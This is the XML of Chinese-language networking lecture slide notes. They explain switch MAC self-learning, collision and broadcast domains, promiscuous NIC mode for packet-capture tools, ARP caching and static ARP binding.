                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>capsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>时，需要把网卡置于混杂模式 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3272529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B29190-C91E-47F1-9AA3-47D9EA1423D9}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>114</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134147"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交换机互联链路层各逻辑网段的特点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分隔冲突域！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HUB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>共享冲突域和广播域，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>switch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>共享广播域，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>router</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>都不共享</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8768432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FD68CAC-2F9B-4EEC-A5EE-9D422A3928A2}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>115</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136195"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交换机的源 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址自学习 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>获取每个帧的源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址，建立（ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>接口）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>交换表。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1684122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38124AB-7148-49F1-9BED-C2CA0B09DD2E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>116</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman"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zh-CN" sz="1000" dirty="0"/>
              <a:t>交换机表的每个表项包括三个字段：节点的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>地址；该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>地址对应的端口；该表项在表中的时间。交换机通过自学习功能来建立交换机表，即通过观察帧的源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>地址和到达端口来建立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1000" dirty="0"/>
              <a:t>地址和端口的映射关系。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14531517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2F9E09-5D5A-47F3-A57D-C1DD3A2C1772}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>117</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="109832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itchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>118</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman"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31038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D5B2EEF-D9C4-4249-B595-8026139893B4}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-AU" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-CN" sz="120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3264641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914EC8-DFDC-4936-B5E6-CC3C199F8795}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>119</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35546792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itchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>122</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121859" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121860" name="Rectangle 1027"/>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kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>网卡工作模式有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>种，分别是：</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广播</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(Broadcast)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>模式</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多播</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(Multicast)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>模式</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单播模式（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Unicast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>）</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混杂模式（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Promiscuous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>）。</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在混杂模式下的网卡能够接收一切通过它的数据，而不管该数据目的地址是否是它。如果通过程序将网卡的工作模式设置为 “混杂模式”，那么网卡将接受所有流经它的数据帧</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN"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混杂模式就是接收所有经过网卡的数据包，包括不是发给本机的包。默认情况下网卡只把发给本机的包（包括广播包）传递给上层程序，其它的包一律丢弃。简单的讲</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>混杂模式就是指网卡能接受所有通过它的数据流，不管是什么格式，什么地址的。事实上，计算机收到数据包后，由网络层进行判断，确定是递交上层（传输层），还是丢弃，还是递交下层（数据链路层、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>子层）转发。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>通常在需要用到抓包工具，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ethereal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sniffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>capsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>时，需要把网卡置于混杂模式 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1732283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31F822C-3D85-48D4-956A-9EF5B42D3863}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>123</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53251"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ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>协议原理－主机动态缓存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP/MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址映射。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1589278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itchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>124</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman"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53511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1074" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2147483647" y="166463663"/>
            <a:ext cx="0" cy="214748364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解决方案：静态</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>绑定</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1714089713"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:overrideClrMapping bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>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E344B05-005A-473C-AEDD-36894F33EA35}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>129</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman"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0034712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BE0F0F-4005-4C97-95FE-EA054E0D72BF}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>138</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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182966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CDEFE-7D86-49DF-AA2A-755A9D6CB7BE}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>141</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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717382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Yiban9-20</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142</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63B2E1-8E0D-4588-B302-A791B89D5136}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>147</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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40631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823E8EF-5D7E-483C-81F9-3DA4AF30E4D7}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-AU" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-CN" sz="120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32991917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E6CAC9-3CE4-4CCA-922A-2323D490C738}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>148</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123227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7C108E-CA02-479C-9533-7D992C7FDFB6}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>150</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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419757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19862E-F5BA-4501-AD58-90402C1C8534}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>151</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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958732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D40927-F197-4D14-BB7B-42B45351ABAA}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>152</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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022130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D51270-DECB-4BCE-AF9D-9226C1C426B5}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>153</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10115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2843F-35DD-4C0F-AD25-76EA4A689F2A}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>154</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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849268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31"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3A4D173C-6080-458B-A520-F1026D27E4F1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>155</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125955" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125956" name="Rectangle 1027"/>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969043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DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
